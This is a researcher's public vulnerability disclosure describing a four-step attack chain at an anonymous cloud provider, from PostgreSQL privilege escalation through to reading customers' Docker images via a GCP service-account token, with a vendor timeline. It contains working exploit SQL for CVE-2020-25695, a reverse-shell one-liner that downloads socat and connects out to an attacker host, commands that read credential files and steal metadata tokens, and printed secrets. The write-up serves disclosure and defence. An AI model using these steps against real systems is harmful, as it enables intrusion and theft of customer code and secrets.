episodes
Qi's journal
Exploiting a 27.23 TB Customer Docker Repository of a Cloud Provider
A series of vulnerabilities granted attackers access to private customer source code and Docker images in February 2021. The company, who asked to remain anonymous in the report, was notified and rolled out a fix.

Author

Qi Linzhi

Vendor disclosure

Feb 18, 2021

Public disclosure

Dec 1, 2021

The provider is a fully managed cloud hosting platform for web applications, backend services, and databases. The exploit allowed attackers to gain access to Docker images of services hosted by the provider in the United States through a chain of vulnerabilities that began with its managed PostgreSQL databases. The images included source code from private GitHub repositories and production secrets from build processes. Any trial account on the platform without credit cards could have exploited this attack chain, making it difficult to identify the party responsible for a would-have-been data breach.

The provider made a same-day patch after my report and commissioned a third-party security group for forensics. The provider found no evidence of abuse for this vulnerability but sent out an advisory recommending affected users to rotate secrets.

At my request, the provider donated $10,000 to the Electronic Frontier Foundation in place of a bounty. I insisted on making the disclosure public but agreed to the provider’s wish not to be named in the report.

I was on a break after graduating from college and happened to have some time to spare poking around the internet. In what became a cautionary tale about the security of emerging cloud platforms who do not receive enough scrutiny for the amount of critical data they host — I inadvertently assumed the role of a rogue white hat hacker. It keeps me up at night to admit that, in a different world where I were an engineer at a growth-stage cloud platform eager to build new features, I might have overlooked the same vulnerability. Infra is tough.

The attack chain

  1. Start a database instance. Create a deferred constraint trigger that includes a command to elevate user privileges and wait for autovacuum to execute with Postgres superuser. (CVE-2020-25695)
  2. Use COPY FROM PROGRAM to execute arbitrary commands or start a reverse shell on the Kubernetes pod running the database. (CVE-2019-9193; disputed by the community)
  3. Use the Google Cloud Platform (GCP) service account on the pod to exchange an OAuth token with the cluster’s metadata server
  4. Use the OAuth token with scope devstorage.read_only to access GCP’s storage bucket for Cloud Container Registry through the Cloud Storage API

Timeline

  • Feb 18, 2021: the provider received and acknowledged my security vulnerability disclosure.
  • Feb 19, 2021: the provider confirmed a fix for the last step of the attack chain and blocked access to the container registry through the service account.
  • Mar 4, 2021: the provider confirmed fixes for all four steps of the attack chain.
  • Sept 28, 2021: the provider received a draft of the public disclosure and provided comments.
  • Oct 29, 2021: the provider’s legal and engineering teams signed off on the content of the public disclosure.

Step 1: Privilege escalation on the PostgreSQL database

Hypothesis

All of the provider’s SQL databases share the same domain, which resolves to a Google Cloud IP address, suggesting at least some of the provider’s services were built on top of Google’s.

The provider offers database instances with shared CPUs, while GCP’s managed PostgreSQL service Cloud SQL does not. The provider’s PostgreSQL service is likely a custom-built infrastructure running on Kubernetes with Postgres pods sitting behind a load balancer instead of a thin layer on top of Google’s.

The provider lets users choose the name of their Postgres database but would sometimes add a random suffix to the database names on creation, presumably to enforce global uniqueness of database names on the platform. This adds to my suspicion that the endpoint points to some load balancing middleware, like pgpool, routing traffic to a cluster of databases pods managed by the provider.

The provider does not offer users the choice of minor PostgreSQL versions. It is unlikely that the provider applies PostgreSQL security updates regularly or automatically on behalf of its users to minimize risks with migrating customer data, which means there’s likely a working CVE available for privilege escalation.

Execution

Create a new database on the provider’s portal, with database name db and username user. The DBMS of the instance is PostgreSQL 11.9. Observe the role attributes of database users on the psql console:

1db=> \du
2                                    List of roles
3  Role name  |                         Attributes                         | Member of
4-------------+------------------------------------------------------------+-----------
5 user        | Create role                                                | {}
6 postgres    | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
7 primaryuser | Replication                                                | {}

CVE-2020-25695

Original GitHub Gist by Etienne Stalmans

Elevate the privilege of our user to superuser. The rest of this step is a minimum reproduction of CVE-2020-25695.

Create a table and an associated index. Per Postgres requirement, functions invoked by indices must be immutable. Let the function return a dummy static value of 0.

1CREATE TABLE data (x int);
2
3CREATE OR REPLACE FUNCTION f_index(integer) RETURNS integer
4	LANGUAGE sql
5	IMMUTABLE AS
6'SELECT 0';
7
8CREATE INDEX idx ON data (f_index(x));

Add another query to the function and set it to inherit the caller’s security privileges. The INSERT query implies that the function is volatile and not immutable, but Postgres 11.9 apparently does not complain about this broken invariant. The query creates a dummy row on a new table, invocation. We’ll come back to this table later.

1CREATE TABLE invocation (time timestamp);
2
3CREATE OR REPLACE FUNCTION f_index(integer) RETURNS integer
4	LANGUAGE sql
5	SECURITY INVOKER AS
6'
7	INSERT INTO db.public.invocation VALUES (now());
8	SELECT 0
9';

Create the trigger and the privilege escalation function. Ask the postgres superuser nicely to invoke it.

1CREATE OR REPLACE FUNCTION f_escalate() RETURNS integer
2	LANGUAGE sql
3	SECURITY INVOKER AS
4'
5	DO
6	$function$
7    	BEGIN
8        	IF current_user = ''postgres'' THEN
9            	ALTER USER user SUPERUSER;
10        	END IF;
11    	END
12	$function$;
13	SELECT 0;
14';
15
16CREATE OR REPLACE FUNCTION f_trigger() RETURNS trigger
17AS
18$e$
19BEGIN
20	PERFORM db.public.f_escalate(); RETURN NEW;
21END
22$e$
23	LANGUAGE plpgsql;

autovaccum runs after deletions to the data table, which has an index that runs a function to insert to the invocation table. We’ll add a trigger to insertions on invocation to run our escalate function. As Stalmans pointed out in the vacuum source code, INITIALLY DEFERRED instructs the trigger to execute at the end of the transaction after switching the security context, which in the case of autovaccum is the superuser postgres.

1CREATE CONSTRAINT TRIGGER trig
2	AFTER INSERT
3	ON invocation
4	INITIALLY DEFERRED
5	FOR EACH ROW
6EXECUTE PROCEDURE f_trigger();

Lower the trigger threshold on the data table and make some dummy transactions to summon autovacuum.

1ALTER TABLE data
2	SET (autovacuum_vacuum_threshold = 0),
3	SET (autovacuum_analyze_threshold = 0);
4
5INSERT INTO data VALUES (1);
6DELETE FROM data WHERE true;
7INSERT INTO data VALUES (1);

See if autovacuum has executed

1SELECT relname, last_autovacuum FROM pg_stat_user_tables WHERE schemaname = 'public';

Observe the role attributes of database users on the psql console:

1db=> \du
2                                    List of roles
3  Role name  |                         Attributes                         | Member of
4-------------+------------------------------------------------------------+-----------
5 user        | Superuser, Create role                                     | {}
6 postgres    | Superuser, Create role, Create DB, Replication, Bypass RLS | {}
7 primaryuser | Replication                                                | {}

Side notes

A superuser has the permissions to create new databases. If all databases share the same namespace, it’s possible that a database created by the superuser but not on the provider’s records could mess with backups and the load balancer.

Step 2: Arbitrary command execution with Postgres superuser

CVE-2019-9193

Response by PostgreSQL

With the COPY FROM PROGRAM command, a superuser can execute arbitrary programs on the host shell on behalf of the Unix user running Postgres and pipe stdout to the database. Postgres claims that this is a feature, not a bug.

Where {script} is the shell script to execute:

1DROP TABLE IF EXISTS stdout;
2CREATE TABLE stdout(line text);
3COPY stdout FROM PROGRAM 'bash -c {script}';
4SELECT * FROM stdout;

We can execute all of steps 3 and 4 through SQL or start an interactive reverse shell with something like:

1COPY stdout FROM PROGRAM 'curl https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat > /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:{host}:{port}'

On the host system with the IP address {host}:

1socat file:`tty`,raw,echo=0 tcp-listen:{port}

Side notes

Credentials for the database users, including the postgres superuser, are stored in plaintext in the filesystem and available as environment variables in the shell. The provider does not restrict logging in with these accounts over the internet. However, this does not pose an imminent security risk since we need Postgres privilege elevation on the database to access these credentials, which are not shared across databases.

1$ for f in "/pgprimary" "/pgroot" "/pguser"; do (cat "${f}/username"; echo -n ":"; cat "${f}/password"; echo); done
2primaryuser:VeRUoF4RPwOTcaPHH8mSsgyXq5tZNlTr
3postgres:bJZM7gORZHkncoyk35KtRAwt77qwqZhf
4user:YRtkjYjaE1blwV3KCiSXOuqxcnabYlQq

Step 3: Obtaining OAuth tokens to access GCP resources through the pod service account

Hypothesis

By default, the pod runtime on Google Kubernetes Engine has access to a GCP service account. The pod service account might have unnecessary permissions inherited from the default service account for all VMs since the runtime is not designed for executing untrusted user applications.

Execution

Gathering some information from the metadata server:

1$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email -H 'Metadata-Flavor:Google'
2█████████████████@███████████.iam.gserviceaccount.com

Listing scopes for the service account found:

1$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
2https://www.googleapis.com/auth/monitoring
3https://www.googleapis.com/auth/devstorage.read_only
4https://www.googleapis.com/auth/logging.write

Let’s try accessing one of these authorized scopes. GKE forbids this with a feature called metadata concealment, which is turned on for the cluster. This prevents access to the instance identity token we need to authenticate as the service account in GCP’s gcloud command line tool.

1$ ./gcloud alpha monitoring channels list
2ERROR: gcloud crashed (MetadataServerException): The request is rejected. Please check if the metadata server is concealed.

Google Cloud docs

Metadata concealment

The catch is that metadata concealment has a beta SLA and is scheduled to be deprecated. In the docs, Google says “[m]etadata concealment does not restrict access to other legacy metadata APIs”. We can get an access token for the service account from the metadata server through … a REST API. The access token allows us to act on behalf of the service account anywhere inside or outside Google Cloud’s network.

1$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/█████████████████@███████████.iam.gserviceaccount.com/token -H 'Metadata-Flavor:Google'
2{"access_token":"ya29.c.KpAB8gfOBB36GONOtRwJXsREgqYBqr-8pXzW4OLN4XXcoIHXMLuWzWjtXPHdeeuGnVqGKxS0Q33H3I2ge-ZtL50VRwFEm2xsvK8zGIoSNhPCqLTJIqjY0Y9LIFG_mJOruPkRWSBM-iVZBdPpeJjTc_fYh9FNcT2swImpImogA8lKwty_7bbD6CQn2b55v8XlhAla","expires_in":3431,"token_type":"Bearer"}

Side notes

The service account has full access to auth/monitoring, which gives us a view of the provider’s infrastructure health and, more importantly, read and write access on alerts policies. These alerts include node stability, volumes attached, GitHub API limits, credit card declinations, and other user abuse indicators — all of which can be disabled by an attacker.

1curl "https://monitoring.googleapis.com/v3/projects/███████████/alertPolicies" \
2     -H 'Authorization: Bearer ya29.c.KpAB8gfOBB36GONOtRwJXsREgqYBqr-8pXzW4OLN4XXcoIHXMLuWzWjtXPHdeeuGnVqGKxS0Q33H3I2ge-ZtL50VRwFEm2xsvK8zGIoSNhPCqLTJIqjY0Y9LIFG_mJOruPkRWSBM-iVZBdPpeJjTc_fYh9FNcT2swImpImogA8lKwty_7bbD6CQn2b55v8XlhAla'

The service account can also create messages to the provider’s on-call management tool, Slack channel #critical, and gave me the phone number of the CEO.

Step 4: Accessing the storage bucket for Docker images

Hypothesis

The provider does not allow deployment from Docker images, only building containers from source code. It makes sense to store the containers on the same cloud platform as their runtime. If the provider does not host its own container library, it is probably using a managed solution by GCP.

Execution

The devstorage.read_only scope allows us to list items in a bucket given its name but does not include storage.buckets.list, which would have allowed us to list buckets names associated with the project. This limits the scope of our storage bucket access without brute-forcing.

Google Cloud docs

Container Registry IAM

Google Container Registry stores images in two buckets relevant to the provider United States region:

  • artifacts.PROJECT-ID.appspot.com
  • us.artifacts.PROJECT-ID.appspot.com

We know the project ID from the service account email address. Fetch the list of artifacts from the REST API:

1curl "https://storage.googleapis.com/storage/v1/b/artifacts.███████████.appspot.com/o?project=███████████" \
2     -H 'Authorization: Bearer ya29.c.KpAB8gcgbWp2lOeSfsPgZyogWLckVcvFQ2SSgLGvSGNnVQtSIRVgKfTJeRUAol1_atraDDmBBdy-gTjMgpoUVTnztUZtNvsVwUiqa-D4SAlZkpC2wlNG6Vs5uguKVZw8iEb9dwmqJWLljzvQuldOi43YV81lYAY_gUxQClwwltQ0AuNGkYjKXoxhAyxhGZ6s8_gK'

When I reported the bug, the two buckets contained 822,470 image layers totaling 27.23 TB with no additional object-level ACL.

1Layer SHA-256                                                      Modification date      Size (bytes)
2------------------------------------------------------------------------------------------------------
30000013103██████████████████████████████████████████████████████   2020-11-23T21:34:01Z   1217978
40000142994██████████████████████████████████████████████████████   2020-05-11T10:03:11Z   14109716
500004e671a██████████████████████████████████████████████████████   2021-01-04T11:38:40Z   1056780
6000054208a██████████████████████████████████████████████████████   2020-04-05T02:28:23Z   117
7000055e9f6██████████████████████████████████████████████████████   2021-01-06T08:07:45Z   14890
800007f2827██████████████████████████████████████████████████████   2020-08-19T15:51:29Z   6764631
900009fe291██████████████████████████████████████████████████████   2019-07-20T07:08:45Z   325
100000ac0264██████████████████████████████████████████████████████   2018-09-13T00:46:19Z   132983
110000ad26c2██████████████████████████████████████████████████████   2020-10-05T11:44:00Z   1908
120000b06206██████████████████████████████████████████████████████   2020-08-11T22:32:34Z   178601690
13....

The provider’s legal team confirmed that the vulnerability only affected private Dockerfiles potentially embedded with sensitive information over a span of three months. No additional metadata was exposed, so images for specific customers could not be targeted without dumping the entire registry.